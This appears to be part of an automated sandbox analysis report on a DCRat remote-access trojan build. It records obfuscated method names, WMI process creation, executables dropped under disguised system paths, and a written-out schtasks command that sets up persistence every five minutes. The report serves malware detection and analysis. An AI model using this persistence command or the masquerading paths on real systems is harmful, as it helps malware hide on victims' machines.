            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, dFjqxW1SiRkKv1aHIWU.csHigh entropy of concatenated method names: 'uUfI1xTCku', 'ly8IIt3WU5', 'qihIfULWf4', 'ovm1Xo6UUvTJqHIDfw8', 'oCeayi6aw7pxgenxSAw', 'etsFF76KnLM89hHha3b', 'rP4PYD6l1FB8P0H5enG', 'CYpuHm6rhG6pAB9dASZ', 'Fvmged65M8Tg4NDO6Nm', 'HaZ8dC6sZElJJtuGVnQ'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, ToD7ohIZAXIUo6hgCXv.csHigh entropy of concatenated method names: 'ePFIRruqKv', 'PaxIOQiKjc', 'OvSIHKO7wq', 'bKoqDecCQqLldv3DM3C', 'B8waWmcbCdXumD6BHjl', 'Vq1cWkcvpZwusjTfjs3', 'mwlO79cEfhnYtU0Y97P', 'hLu83JcejPSydaiAkxU', 'gcRYiMcLQlmB7wcPp1A', 'uwKkRjc3dUVmWZ2GZwL'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, BbYTgtQLihEIjiYLvDZ.csHigh entropy of concatenated method names: '_7zt', 'KpTPUlc4jF', 'jhVPt6f2Li', 'Fp2P57wZcV', 'UUQPV7FVac', 'TM5PcVjnWi', 'RupP4s96Cx', 'y9vBOGNgFnQyOfVEHkr', 'byOq6kN8CXPMDMlkWAo', 'eTcSeUNPG1XIDMFedQX'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, j9LrO9fbJnnDePiDox5.csHigh entropy of concatenated method names: 'KVD2i9Fb4X', 'y192wLvR6t', 'STn2pPmEV1', 'NDuBlBP12rA5tjQieZX', 'S07fSbPmbP70LqmNAtx', 'Bj7DwXPWZcEFdq6mPTB', 'PR8Ij9PKNtcKSlovNeq', 'QUZ7duPlHWOqhLsOGDm', 'yVoKqaPU4JyWPshEKE4', 'aL6LQ3Pa2Uwhx08iedT'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, yBRtMgf1hAkErtdsSdS.csHigh entropy of concatenated method names: 'KBqY3YAcqo', 'kwoYrepGrJ', 'hfJYJNF6kn', 'nH1YT3m2kj', 'DhIoQqBzqpOqfIBHRwa', 'CQGWypB2WxdXQGRHnLo', 'nIcNDGBdg3O9BgusJQx', 'T2GfkwZHb8s3oDO16v7', 'GHdrqPZARP03eqIjUCr', 'smKUIdZVuj6jMtUHBEG'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, uxL8lxfUvgFnXycRaue.csHigh entropy of concatenated method names: 'xex6K3wQQb', 'xMe6bX75SO', 'etb6y20EgO', 'g8nki9DpZ6byqCVKEeG', 'E2uM9uDXOwxiJypj9Qk', 'HnNicpDodfOlyEUwnn1', 'OcdF72DRTKu55FZXJIB', 'OrY6mToTgh', 'yFm6Y7TNLL', 'Sgx62Gd9Qk'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, BHmp2TkGJbLvp37Hiy.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'dbicqoVtUP3ZR6gCJEI', 'AIboB4VchFh6wAFmkML', 'DKgYrUVwG8JZcXtJPcv', 'mmmQptVYDwbjK92kquE', 'MbnR2BVJ7Si4YuHG6sr', 'C0IAUmVM3NjuRDti870'

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exeJump to dropped file
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Users\Default\Videos\dfVXJbANbh.exeJump to dropped file
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Program Files\7-Zip\Lang\System.exeJump to dropped file
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Users\Public\Music\dfVXJbANbh.exeJump to dropped file
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\dfVXJbANbh.exeJump to dropped file
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeJump to dropped file
            Source: C:\Users\user\Desktop\DCRatBuild.exeFile created: C:\ChainBlocksurrogateagentFont\portperf.exeJump to dropped file
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exeJump to dropped file
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exeJump to dropped file
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Program Files (x86)\Windows Multimedia Platform\dfVXJbANbh.exeJump to dropped file
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile created: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /f
            Source: C:\Users\user\Desktop\DCRatBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
